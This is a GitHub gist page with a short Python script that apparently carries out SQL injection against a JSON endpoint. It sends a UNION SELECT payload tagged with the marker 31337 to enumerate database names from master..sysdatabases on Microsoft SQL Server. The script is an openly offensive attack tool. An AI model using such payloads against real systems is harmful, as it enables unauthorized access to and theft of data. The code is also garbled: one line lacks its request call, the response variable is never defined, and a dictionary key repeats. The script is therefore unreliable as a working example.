Skip to content

Instantly share code, notes, and snippets.

@scovell scovell/
Created Nov 27, 2012

What would you like to do?
import json
import requests
#function for executing the sql queries
def sqli(payload):
#make the content type of the request JSON
headers={'Content-type': 'application/json', 'Accept': 'text/plain'}
url="SQLI URL",data=data,headers=headers)
for r in response:
#check for the database output. 31337 is the identifier mark used in the payload
if r['value']=="31337":
print r['name']
def main():
list_of_db={"PARAMETER":"PARAMETER:'4' UNION SELECT 31337,name COLLATE Arabic_CI_AS FROM master..sysdatabases--","PARAMETER":"PARAMETER"}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.